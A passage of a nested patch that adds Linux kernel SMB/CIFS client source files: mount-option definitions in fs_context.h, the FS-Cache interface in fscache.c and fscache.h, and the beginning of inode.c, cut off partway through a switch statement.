++	Opt_cache_rw,
++	Opt_cache_err
++};
++
++enum cifs_sec_param {
++	Opt_sec_krb5,
++	Opt_sec_krb5i,
++	Opt_sec_krb5p,
++	Opt_sec_ntlmsspi,
++	Opt_sec_ntlmssp,
++	Opt_sec_ntlmv2,
++	Opt_sec_ntlmv2i,
++	Opt_sec_none,
++
++	Opt_sec_err
++};
++
++enum cifs_param {
++	/* Mount options that take no arguments */
++	Opt_user_xattr,
++	Opt_forceuid,
++	Opt_forcegid,
++	Opt_noblocksend,
++	Opt_noautotune,
++	Opt_nolease,
++	Opt_nosparse,
++	Opt_hard,
++	Opt_soft,
++	Opt_perm,
++	Opt_nodelete,
++	Opt_mapposix,
++	Opt_mapchars,
++	Opt_nomapchars,
++	Opt_sfu,
++	Opt_nodfs,
++	Opt_posixpaths,
++	Opt_unix,
++	Opt_nocase,
++	Opt_brl,
++	Opt_handlecache,
++	Opt_forcemandatorylock,
++	Opt_setuidfromacl,
++	Opt_setuids,
++	Opt_dynperm,
++	Opt_intr,
++	Opt_strictsync,
++	Opt_serverino,
++	Opt_rwpidforward,
++	Opt_cifsacl,
++	Opt_acl,
++	Opt_locallease,
++	Opt_sign,
++	Opt_ignore_signature,
++	Opt_seal,
++	Opt_noac,
++	Opt_fsc,
++	Opt_mfsymlinks,
++	Opt_multiuser,
++	Opt_sloppy,
++	Opt_nosharesock,
++	Opt_persistent,
++	Opt_resilient,
++	Opt_tcp_nodelay,
++	Opt_domainauto,
++	Opt_rdma,
++	Opt_modesid,
++	Opt_rootfs,
++	Opt_multichannel,
++	Opt_compress,
++	Opt_witness,
++
++	/* Mount options which take numeric value */
++	Opt_backupuid,
++	Opt_backupgid,
++	Opt_uid,
++	Opt_cruid,
++	Opt_gid,
++	Opt_port,
++	Opt_file_mode,
++	Opt_dirmode,
++	Opt_min_enc_offload,
++	Opt_blocksize,
++	Opt_rasize,
++	Opt_rsize,
++	Opt_wsize,
++	Opt_actimeo,
++	Opt_acdirmax,
++	Opt_acregmax,
++	Opt_closetimeo,
++	Opt_echo_interval,
++	Opt_max_credits,
++	Opt_snapshot,
++	Opt_max_channels,
++	Opt_handletimeout,
++
++	/* Mount options which take string value */
++	Opt_source,
++	Opt_user,
++	Opt_pass,
++	Opt_ip,
++	Opt_domain,
++	Opt_srcaddr,
++	Opt_iocharset,
++	Opt_netbiosname,
++	Opt_servern,
++	Opt_ver,
++	Opt_vers,
++	Opt_sec,
++	Opt_cache,
++
++	/* Mount options to be ignored */
++	Opt_ignore,
++
++	Opt_err
++};
++
++struct smb3_fs_context {
++	bool uid_specified;
++	bool cruid_specified;
++	bool gid_specified;
++	bool sloppy;
++	bool got_ip;
++	bool got_version;
++	bool got_rsize;
++	bool got_wsize;
++	bool got_bsize;
++	unsigned short port;
++
++	char *username;
++	char *password;
++	char *domainname;
++	char *source;
++	char *server_hostname;
++	char *UNC;
++	char *nodename;
++	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
++	char *iocharset;  /* local code page for mapping to and from Unicode */
++	char source_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* clnt nb name */
++	char target_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* srvr nb name */
++	kuid_t cred_uid;
++	kuid_t linux_uid;
++	kgid_t linux_gid;
++	kuid_t backupuid;
++	kgid_t backupgid;
++	umode_t file_mode;
++	umode_t dir_mode;
++	enum securityEnum sectype; /* sectype requested via mnt opts */
++	bool sign; /* was signing requested via mnt opts? */
++	bool ignore_signature:1;
++	bool retry:1;
++	bool intr:1;
++	bool setuids:1;
++	bool setuidfromacl:1;
++	bool override_uid:1;
++	bool override_gid:1;
++	bool dynperm:1;
++	bool noperm:1;
++	bool nodelete:1;
++	bool mode_ace:1;
++	bool no_psx_acl:1; /* set if posix acl support should be disabled */
++	bool cifs_acl:1;
++	bool backupuid_specified; /* mount option  backupuid  is specified */
++	bool backupgid_specified; /* mount option  backupgid  is specified */
++	bool no_xattr:1;   /* set if xattr (EA) support should be disabled*/
++	bool server_ino:1; /* use inode numbers from server ie UniqueId */
++	bool direct_io:1;
++	bool strict_io:1; /* strict cache behavior */
++	bool cache_ro:1;
++	bool cache_rw:1;
++	bool remap:1;      /* set to remap seven reserved chars in filenames */
++	bool sfu_remap:1;  /* remap seven reserved chars ala SFU */
++	bool posix_paths:1; /* unset to not ask for posix pathnames. */
++	bool no_linux_ext:1;
++	bool linux_ext:1;
++	bool sfu_emul:1;
++	bool nullauth:1;   /* attempt to authenticate with null user */
++	bool nocase:1;     /* request case insensitive filenames */
++	bool nobrl:1;      /* disable sending byte range locks to srv */
++	bool nohandlecache:1; /* disable caching dir handles if srvr probs */
++	bool mand_lock:1;  /* send mandatory not posix byte range lock reqs */
++	bool seal:1;       /* request transport encryption on share */
++	bool nodfs:1;      /* Do not request DFS, even if available */
++	bool local_lease:1; /* check leases only on local system, not remote */
++	bool noblocksnd:1;
++	bool noautotune:1;
++	bool nostrictsync:1; /* do not force expensive SMBflush on every sync */
++	bool no_lease:1;     /* disable requesting leases */
++	bool no_sparse:1;    /* do not attempt to set files sparse */
++	bool fsc:1;	/* enable fscache */
++	bool mfsymlinks:1; /* use Minshall+French Symlinks */
++	bool multiuser:1;
++	bool rwpidforward:1; /* pid forward for read/write operations */
++	bool nosharesock:1;
++	bool persistent:1;
++	bool nopersistent:1;
++	bool resilient:1; /* noresilient not required since not fored for CA */
++	bool domainauto:1;
++	bool rdma:1;
++	bool multichannel:1;
++	bool use_client_guid:1;
++	/* reuse existing guid for multichannel */
++	u8 client_guid[SMB2_CLIENT_GUID_SIZE];
++	unsigned int bsize;
++	unsigned int rasize;
++	unsigned int rsize;
++	unsigned int wsize;
++	unsigned int min_offload;
++	bool sockopt_tcp_nodelay:1;
++	/* attribute cache timemout for files and directories in jiffies */
++	unsigned long acregmax;
++	unsigned long acdirmax;
++	/* timeout for deferred close of files in jiffies */
++	unsigned long closetimeo;
++	struct smb_version_operations *ops;
++	struct smb_version_values *vals;
++	char *prepath;
++	struct sockaddr_storage dstaddr; /* destination address */
++	struct sockaddr_storage srcaddr; /* allow binding to a local IP */
++	struct nls_table *local_nls; /* This is a copy of the pointer in cifs_sb */
++	unsigned int echo_interval; /* echo interval in secs */
++	__u64 snapshot_time; /* needed for timewarp tokens */
++	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
++	unsigned int max_credits; /* smb3 max_credits 10 < credits < 60000 */
++	unsigned int max_channels;
++	__u16 compression; /* compression algorithm 0xFFFF default 0=disabled */
++	bool rootfs:1; /* if it's a SMB root file system */
++	bool witness:1; /* use witness protocol */
++
++	char *mount_options;
++};
++
++extern const struct fs_parameter_spec smb3_fs_parameters[];
++
++extern int smb3_init_fs_context(struct fs_context *fc);
++extern void smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx);
++extern void smb3_cleanup_fs_context(struct smb3_fs_context *ctx);
++
++static inline struct smb3_fs_context *smb3_fc2context(const struct fs_context *fc)
++{
++	return fc->fs_private;
++}
++
++extern int smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx);
++extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
++
++/*
++ * max deferred close timeout (jiffies) - 2^30
++ */
++#define SMB3_MAX_DCLOSETIMEO (1 << 30)
++#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
++
++extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
++
++#endif
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+new file mode 100644
+index 0000000000000..f6f3a6b75601b
+--- /dev/null
++++ b/fs/smb/client/fscache.c
+@@ -0,0 +1,253 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *   CIFS filesystem cache interface
++ *
++ *   Copyright (c) 2010 Novell, Inc.
++ *   Author(s): Suresh Jayaraman <sjayaraman@suse.de>
++ *
++ */
++#include "fscache.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifsproto.h"
++
++static void cifs_fscache_fill_volume_coherency(
++	struct cifs_tcon *tcon,
++	struct cifs_fscache_volume_coherency_data *cd)
++{
++	memset(cd, 0, sizeof(*cd));
++	cd->resource_id		= cpu_to_le64(tcon->resource_id);
++	cd->vol_create_time	= tcon->vol_create_time;
++	cd->vol_serial_number	= cpu_to_le32(tcon->vol_serial_number);
++}
++
++int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon)
++{
++	struct cifs_fscache_volume_coherency_data cd;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct fscache_volume *vcookie;
++	const struct sockaddr *sa = (struct sockaddr *)&server->dstaddr;
++	size_t slen, i;
++	char *sharename;
++	char *key;
++	int ret = -ENOMEM;
++
++	tcon->fscache = NULL;
++	switch (sa->sa_family) {
++	case AF_INET:
++	case AF_INET6:
++		break;
++	default:
++		cifs_dbg(VFS, "Unknown network family '%d'\n", sa->sa_family);
++		return -EINVAL;
++	}
++
++	memset(&key, 0, sizeof(key));
++
++	sharename = extract_sharename(tcon->tree_name);
++	if (IS_ERR(sharename)) {
++		cifs_dbg(FYI, "%s: couldn't extract sharename\n", __func__);
++		return -EINVAL;
++	}
++
++	slen = strlen(sharename);
++	for (i = 0; i < slen; i++)
++		if (sharename[i] == '/')
++			sharename[i] = ';';
++
++	key = kasprintf(GFP_KERNEL, "cifs,%pISpc,%s", sa, sharename);
++	if (!key)
++		goto out;
++
++	cifs_fscache_fill_volume_coherency(tcon, &cd);
++	vcookie = fscache_acquire_volume(key,
++					 NULL, /* preferred_cache */
++					 &cd, sizeof(cd));
++	cifs_dbg(FYI, "%s: (%s/0x%p)\n", __func__, key, vcookie);
++	if (IS_ERR(vcookie)) {
++		if (vcookie != ERR_PTR(-EBUSY)) {
++			ret = PTR_ERR(vcookie);
++			goto out_2;
++		}
++		pr_err("Cache volume key already in use (%s)\n", key);
++		vcookie = NULL;
++	}
++
++	tcon->fscache = vcookie;
++	ret = 0;
++out_2:
++	kfree(key);
++out:
++	kfree(sharename);
++	return ret;
++}
++
++void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon)
++{
++	struct cifs_fscache_volume_coherency_data cd;
++
++	cifs_dbg(FYI, "%s: (0x%p)\n", __func__, tcon->fscache);
++
++	cifs_fscache_fill_volume_coherency(tcon, &cd);
++	fscache_relinquish_volume(tcon->fscache, &cd, false);
++	tcon->fscache = NULL;
++}
++
++void cifs_fscache_get_inode_cookie(struct inode *inode)
++{
++	struct cifs_fscache_inode_coherency_data cd;
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_fscache_fill_coherency(&cifsi->netfs.inode, &cd);
++
++	cifsi->netfs.cache =
++		fscache_acquire_cookie(tcon->fscache, 0,
++				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
++				       &cd, sizeof(cd),
++				       i_size_read(&cifsi->netfs.inode));
++}
++
++void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update)
++{
++	if (update) {
++		struct cifs_fscache_inode_coherency_data cd;
++		loff_t i_size = i_size_read(inode);
++
++		cifs_fscache_fill_coherency(inode, &cd);
++		fscache_unuse_cookie(cifs_inode_cookie(inode), &cd, &i_size);
++	} else {
++		fscache_unuse_cookie(cifs_inode_cookie(inode), NULL, NULL);
++	}
++}
++
++void cifs_fscache_release_inode_cookie(struct inode *inode)
++{
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++
++	if (cookie) {
++		cifs_dbg(FYI, "%s: (0x%p)\n", __func__, cookie);
++		fscache_relinquish_cookie(cookie, false);
++		cifsi->netfs.cache = NULL;
++	}
++}
++
++/*
++ * Fallback page reading interface.
++ */
++static int fscache_fallback_read_page(struct inode *inode, struct page *page)
++{
++	struct netfs_cache_resources cres;
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++	struct iov_iter iter;
++	struct bio_vec bvec[1];
++	int ret;
++
++	memset(&cres, 0, sizeof(cres));
++	bvec[0].bv_page		= page;
++	bvec[0].bv_offset	= 0;
++	bvec[0].bv_len		= PAGE_SIZE;
++	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++
++	ret = fscache_begin_read_operation(&cres, cookie);
++	if (ret < 0)
++		return ret;
++
++	ret = fscache_read(&cres, page_offset(page), &iter, NETFS_READ_HOLE_FAIL,
++			   NULL, NULL);
++	fscache_end_operation(&cres);
++	return ret;
++}
++
++/*
++ * Fallback page writing interface.
++ */
++static int fscache_fallback_write_page(struct inode *inode, struct page *page,
++				       bool no_space_allocated_yet)
++{
++	struct netfs_cache_resources cres;
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++	struct iov_iter iter;
++	struct bio_vec bvec[1];
++	loff_t start = page_offset(page);
++	size_t len = PAGE_SIZE;
++	int ret;
++
++	memset(&cres, 0, sizeof(cres));
++	bvec[0].bv_page		= page;
++	bvec[0].bv_offset	= 0;
++	bvec[0].bv_len		= PAGE_SIZE;
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++
++	ret = fscache_begin_write_operation(&cres, cookie);
++	if (ret < 0)
++		return ret;
++
++	ret = cres.ops->prepare_write(&cres, &start, &len, i_size_read(inode),
++				      no_space_allocated_yet);
++	if (ret == 0)
++		ret = fscache_write(&cres, page_offset(page), &iter, NULL, NULL);
++	fscache_end_operation(&cres);
++	return ret;
++}
++
++/*
++ * Retrieve a page from FS-Cache
++ */
++int __cifs_readpage_from_fscache(struct inode *inode, struct page *page)
++{
++	int ret;
++
++	cifs_dbg(FYI, "%s: (fsc:%p, p:%p, i:0x%p\n",
++		 __func__, cifs_inode_cookie(inode), page, inode);
++
++	ret = fscache_fallback_read_page(inode, page);
++	if (ret < 0)
++		return ret;
++
++	/* Read completed synchronously */
++	SetPageUptodate(page);
++	return 0;
++}
++
++void __cifs_readpage_to_fscache(struct inode *inode, struct page *page)
++{
++	cifs_dbg(FYI, "%s: (fsc: %p, p: %p, i: %p)\n",
++		 __func__, cifs_inode_cookie(inode), page, inode);
++
++	fscache_fallback_write_page(inode, page, true);
++}
++
++/*
++ * Query the cache occupancy.
++ */
++int __cifs_fscache_query_occupancy(struct inode *inode,
++				   pgoff_t first, unsigned int nr_pages,
++				   pgoff_t *_data_first,
++				   unsigned int *_data_nr_pages)
++{
++	struct netfs_cache_resources cres;
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++	loff_t start, data_start;
++	size_t len, data_len;
++	int ret;
++
++	ret = fscache_begin_read_operation(&cres, cookie);
++	if (ret < 0)
++		return ret;
++
++	start = first * PAGE_SIZE;
++	len = nr_pages * PAGE_SIZE;
++	ret = cres.ops->query_occupancy(&cres, start, len, PAGE_SIZE,
++					&data_start, &data_len);
++	if (ret == 0) {
++		*_data_first = data_start / PAGE_SIZE;
++		*_data_nr_pages = len / PAGE_SIZE;
++	}
++
++	fscache_end_operation(&cres);
++	return ret;
++}
+diff --git a/fs/smb/client/fscache.h b/fs/smb/client/fscache.h
+new file mode 100644
+index 0000000000000..67b601041f0a3
+--- /dev/null
++++ b/fs/smb/client/fscache.h
+@@ -0,0 +1,148 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *   CIFS filesystem cache interface definitions
++ *
++ *   Copyright (c) 2010 Novell, Inc.
++ *   Authors(s): Suresh Jayaraman (sjayaraman@suse.de>
++ *
++ */
++#ifndef _CIFS_FSCACHE_H
++#define _CIFS_FSCACHE_H
++
++#include <linux/swap.h>
++#include <linux/fscache.h>
++
++#include "cifsglob.h"
++
++/*
++ * Coherency data attached to CIFS volume within the cache
++ */
++struct cifs_fscache_volume_coherency_data {
++	__le64	resource_id;		/* unique server resource id */
++	__le64	vol_create_time;
++	__le32	vol_serial_number;
++} __packed;
++
++/*
++ * Coherency data attached to CIFS inode within the cache.
++ */
++struct cifs_fscache_inode_coherency_data {
++	__le64 last_write_time_sec;
++	__le64 last_change_time_sec;
++	__le32 last_write_time_nsec;
++	__le32 last_change_time_nsec;
++};
++
++#ifdef CONFIG_CIFS_FSCACHE
++
++/*
++ * fscache.c
++ */
++extern int cifs_fscache_get_super_cookie(struct cifs_tcon *);
++extern void cifs_fscache_release_super_cookie(struct cifs_tcon *);
++
++extern void cifs_fscache_get_inode_cookie(struct inode *inode);
++extern void cifs_fscache_release_inode_cookie(struct inode *);
++extern void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update);
++
++static inline
++void cifs_fscache_fill_coherency(struct inode *inode,
++				 struct cifs_fscache_inode_coherency_data *cd)
++{
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++
++	memset(cd, 0, sizeof(*cd));
++	cd->last_write_time_sec   = cpu_to_le64(cifsi->netfs.inode.i_mtime.tv_sec);
++	cd->last_write_time_nsec  = cpu_to_le32(cifsi->netfs.inode.i_mtime.tv_nsec);
++	cd->last_change_time_sec  = cpu_to_le64(cifsi->netfs.inode.i_ctime.tv_sec);
++	cd->last_change_time_nsec = cpu_to_le32(cifsi->netfs.inode.i_ctime.tv_nsec);
++}
++
++
++static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode)
++{
++	return netfs_i_cookie(&CIFS_I(inode)->netfs);
++}
++
++static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags)
++{
++	struct cifs_fscache_inode_coherency_data cd;
++
++	cifs_fscache_fill_coherency(inode, &cd);
++	fscache_invalidate(cifs_inode_cookie(inode), &cd,
++			   i_size_read(inode), flags);
++}
++
++extern int __cifs_fscache_query_occupancy(struct inode *inode,
++					  pgoff_t first, unsigned int nr_pages,
++					  pgoff_t *_data_first,
++					  unsigned int *_data_nr_pages);
++
++static inline int cifs_fscache_query_occupancy(struct inode *inode,
++					       pgoff_t first, unsigned int nr_pages,
++					       pgoff_t *_data_first,
++					       unsigned int *_data_nr_pages)
++{
++	if (!cifs_inode_cookie(inode))
++		return -ENOBUFS;
++	return __cifs_fscache_query_occupancy(inode, first, nr_pages,
++					      _data_first, _data_nr_pages);
++}
++
++extern int __cifs_readpage_from_fscache(struct inode *pinode, struct page *ppage);
++extern void __cifs_readpage_to_fscache(struct inode *pinode, struct page *ppage);
++
++
++static inline int cifs_readpage_from_fscache(struct inode *inode,
++					     struct page *page)
++{
++	if (cifs_inode_cookie(inode))
++		return __cifs_readpage_from_fscache(inode, page);
++	return -ENOBUFS;
++}
++
++static inline void cifs_readpage_to_fscache(struct inode *inode,
++					    struct page *page)
++{
++	if (cifs_inode_cookie(inode))
++		__cifs_readpage_to_fscache(inode, page);
++}
++
++#else /* CONFIG_CIFS_FSCACHE */
++static inline
++void cifs_fscache_fill_coherency(struct inode *inode,
++				 struct cifs_fscache_inode_coherency_data *cd)
++{
++}
++
++static inline int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon) { return 0; }
++static inline void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon) {}
++
++static inline void cifs_fscache_get_inode_cookie(struct inode *inode) {}
++static inline void cifs_fscache_release_inode_cookie(struct inode *inode) {}
++static inline void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update) {}
++static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode) { return NULL; }
++static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags) {}
++
++static inline int cifs_fscache_query_occupancy(struct inode *inode,
++					       pgoff_t first, unsigned int nr_pages,
++					       pgoff_t *_data_first,
++					       unsigned int *_data_nr_pages)
++{
++	*_data_first = ULONG_MAX;
++	*_data_nr_pages = 0;
++	return -ENOBUFS;
++}
++
++static inline int
++cifs_readpage_from_fscache(struct inode *inode, struct page *page)
++{
++	return -ENOBUFS;
++}
++
++static inline
++void cifs_readpage_to_fscache(struct inode *inode, struct page *page) {}
++
++#endif /* CONFIG_CIFS_FSCACHE */
++
++#endif /* _CIFS_FSCACHE_H */
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+new file mode 100644
+index 0000000000000..92c1ed9304be7
+--- /dev/null
++++ b/fs/smb/client/inode.c
+@@ -0,0 +1,3093 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2010
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <linux/freezer.h>
++#include <linux/sched/signal.h>
++#include <linux/wait_bit.h>
++#include <linux/fiemap.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fscache.h"
++#include "fs_context.h"
++#include "cifs_ioctl.h"
++#include "cached_dir.h"
++
++static void cifs_set_ops(struct inode *inode)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	switch (inode->i_mode & S_IFMT) {
++	case S_IFREG:
++		inode->i_op = &cifs_file_inode_ops;
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
++			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++				inode->i_fop = &cifs_file_direct_nobrl_ops;
++			else
++				inode->i_fop = &cifs_file_direct_ops;
++		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
++			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++				inode->i_fop = &cifs_file_strict_nobrl_ops;
++			else
++				inode->i_fop = &cifs_file_strict_ops;
++		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++			inode->i_fop = &cifs_file_nobrl_ops;
++		else { /* not direct, send byte range locks */
++			inode->i_fop = &cifs_file_ops;
++		}
++
++		/* check if server can support readahead */
++		if (cifs_sb_master_tcon(cifs_sb)->ses->server->max_read <
++				PAGE_SIZE + MAX_CIFS_HDR_SIZE)
++			inode->i_data.a_ops = &cifs_addr_ops_smallbuf;
++		else
++			inode->i_data.a_ops = &cifs_addr_ops;
++		break;
++	case S_IFDIR:
++#ifdef CONFIG_CIFS_DFS_UPCALL
++		if (IS_AUTOMOUNT(inode)) {
++			inode->i_op = &cifs_dfs_referral_inode_operations;
++		} else {
++#else /* NO DFS support, treat as a directory */
++		{
++#endif
++			inode->i_op = &cifs_dir_inode_ops;
++			inode->i_fop = &cifs_dir_ops;
++		}
++		break;
++	case S_IFLNK:
++		inode->i_op = &cifs_symlink_inode_ops;
++		break;
++	default:
++		init_special_inode(inode, inode->i_mode, inode->i_rdev);
++		break;
++	}
++}
++
++/* check inode attributes against fattr. If they don't match, tag the
++ * inode for cache invalidation
++ */
++static void
++cifs_revalidate_cache(struct inode *inode, struct cifs_fattr *fattr)
++{
++	struct cifs_fscache_inode_coherency_data cd;
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++
++	cifs_dbg(FYI, "%s: revalidating inode %llu\n",
++		 __func__, cifs_i->uniqueid);
++
++	if (inode->i_state & I_NEW) {
++		cifs_dbg(FYI, "%s: inode %llu is new\n",
++			 __func__, cifs_i->uniqueid);
++		return;
++	}
++
++	/* don't bother with revalidation if we have an oplock */
++	if (CIFS_CACHE_READ(cifs_i)) {
++		cifs_dbg(FYI, "%s: inode %llu is oplocked\n",
++			 __func__, cifs_i->uniqueid);
++		return;
++	}
++
++	 /* revalidate if mtime or size have changed */
++	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
++	if (timespec64_equal(&inode->i_mtime, &fattr->cf_mtime) &&
++	    cifs_i->server_eof == fattr->cf_eof) {
++		cifs_dbg(FYI, "%s: inode %llu is unchanged\n",
++			 __func__, cifs_i->uniqueid);
++		return;
++	}
++
++	cifs_dbg(FYI, "%s: invalidating inode %llu mapping\n",
++		 __func__, cifs_i->uniqueid);
++	set_bit(CIFS_INO_INVALID_MAPPING, &cifs_i->flags);
++	/* Invalidate fscache cookie */
++	cifs_fscache_fill_coherency(&cifs_i->netfs.inode, &cd);
++	fscache_invalidate(cifs_inode_cookie(inode), &cd, i_size_read(inode), 0);
++}
++
++/*
++ * copy nlink to the inode, unless it wasn't provided.  Provide
++ * sane values if we don't have an existing one and none was provided
++ */
++static void
++cifs_nlink_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
++{
++	/*
++	 * if we're in a situation where we can't trust what we
++	 * got from the server (readdir, some non-unix cases)
++	 * fake reasonable values
++	 */
++	if (fattr->cf_flags & CIFS_FATTR_UNKNOWN_NLINK) {
++		/* only provide fake values on a new inode */
++		if (inode->i_state & I_NEW) {
++			if (fattr->cf_cifsattrs & ATTR_DIRECTORY)
++				set_nlink(inode, 2);
++			else
++				set_nlink(inode, 1);
++		}
++		return;
++	}
++
++	/* we trust the server, so update it */
++	set_nlink(inode, fattr->cf_nlink);
++}
++
++/* populate an inode with info from a cifs_fattr struct */
++int
++cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
++{
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	if (!(inode->i_state & I_NEW) &&
++	    unlikely(inode_wrong_type(inode, fattr->cf_mode))) {
++		CIFS_I(inode)->time = 0; /* force reval */
++		return -ESTALE;
++	}
++
++	cifs_revalidate_cache(inode, fattr);
++
++	spin_lock(&inode->i_lock);
++	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
++	fattr->cf_atime = timestamp_truncate(fattr->cf_atime, inode);
++	fattr->cf_ctime = timestamp_truncate(fattr->cf_ctime, inode);
++	/* we do not want atime to be less than mtime, it broke some apps */
++	if (timespec64_compare(&fattr->cf_atime, &fattr->cf_mtime) < 0)
++		inode->i_atime = fattr->cf_mtime;
++	else
++		inode->i_atime = fattr->cf_atime;
++	inode->i_mtime = fattr->cf_mtime;
++	inode->i_ctime = fattr->cf_ctime;
++	inode->i_rdev = fattr->cf_rdev;
++	cifs_nlink_fattr_to_inode(inode, fattr);
++	inode->i_uid = fattr->cf_uid;
++	inode->i_gid = fattr->cf_gid;
++
++	/* if dynperm is set, don't clobber existing mode */
++	if (inode->i_state & I_NEW ||
++	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM))
++		inode->i_mode = fattr->cf_mode;
++
++	cifs_i->cifsAttrs = fattr->cf_cifsattrs;
++
++	if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
++		cifs_i->time = 0;
++	else
++		cifs_i->time = jiffies;
++
++	if (fattr->cf_flags & CIFS_FATTR_DELETE_PENDING)
++		set_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
++	else
++		clear_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
++
++	cifs_i->server_eof = fattr->cf_eof;
++	/*
++	 * Can't safely change the file size here if the client is writing to
++	 * it due to potential races.
++	 */
++	if (is_size_safe_to_change(cifs_i, fattr->cf_eof)) {
++		i_size_write(inode, fattr->cf_eof);
++
++		/*
++		 * i_blocks is not related to (i_size / i_blksize),
++		 * but instead 512 byte (2**9) size is required for
++		 * calculating num blocks.
++		 */
++		inode->i_blocks = (512 - 1 + fattr->cf_bytes) >> 9;
++	}
++
++	if (S_ISLNK(fattr->cf_mode)) {
++		kfree(cifs_i->symlink_target);
++		cifs_i->symlink_target = fattr->cf_symlink_target;
++		fattr->cf_symlink_target = NULL;
++	}
++	spin_unlock(&inode->i_lock);
++
++	if (fattr->cf_flags & CIFS_FATTR_DFS_REFERRAL)
++		inode->i_flags |= S_AUTOMOUNT;
++	if (inode->i_state & I_NEW)
++		cifs_set_ops(inode);
++	return 0;
++}
++
++void
++cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
++		return;
++
++	fattr->cf_uniqueid = iunique(sb, ROOT_I);
++}
++
++/* Fill a cifs_fattr struct with info from FILE_UNIX_BASIC_INFO. */
++void
++cifs_unix_basic_to_fattr(struct cifs_fattr *fattr, FILE_UNIX_BASIC_INFO *info,
++			 struct cifs_sb_info *cifs_sb)
++{
++	memset(fattr, 0, sizeof(*fattr));
++	fattr->cf_uniqueid = le64_to_cpu(info->UniqueId);
++	fattr->cf_bytes = le64_to_cpu(info->NumOfBytes);
++	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
++
++	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
++	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastModificationTime);
++	fattr->cf_ctime = cifs_NTtimeToUnix(info->LastStatusChange);
++	/* old POSIX extensions don't get create time */
++
++	fattr->cf_mode = le64_to_cpu(info->Permissions);
++
++	/*
++	 * Since we set the inode type below we need to mask off
++	 * to avoid strange results if bits set above.
++	 */
++	fattr->cf_mode &= ~S_IFMT;
++	switch (le32_to_cpu(info->Type)) {
++	case UNIX_FILE:
++		fattr->cf_mode |= S_IFREG;
++		fattr->cf_dtype = DT_REG;
++		break;
++	case UNIX_SYMLINK:
++		fattr->cf_mode |= S_IFLNK;
++		fattr->cf_dtype = DT_LNK;
++		break;
++	case UNIX_DIR:
++		fattr->cf_mode |= S_IFDIR;
++		fattr->cf_dtype = DT_DIR;
++		break;
++	case UNIX_CHARDEV:
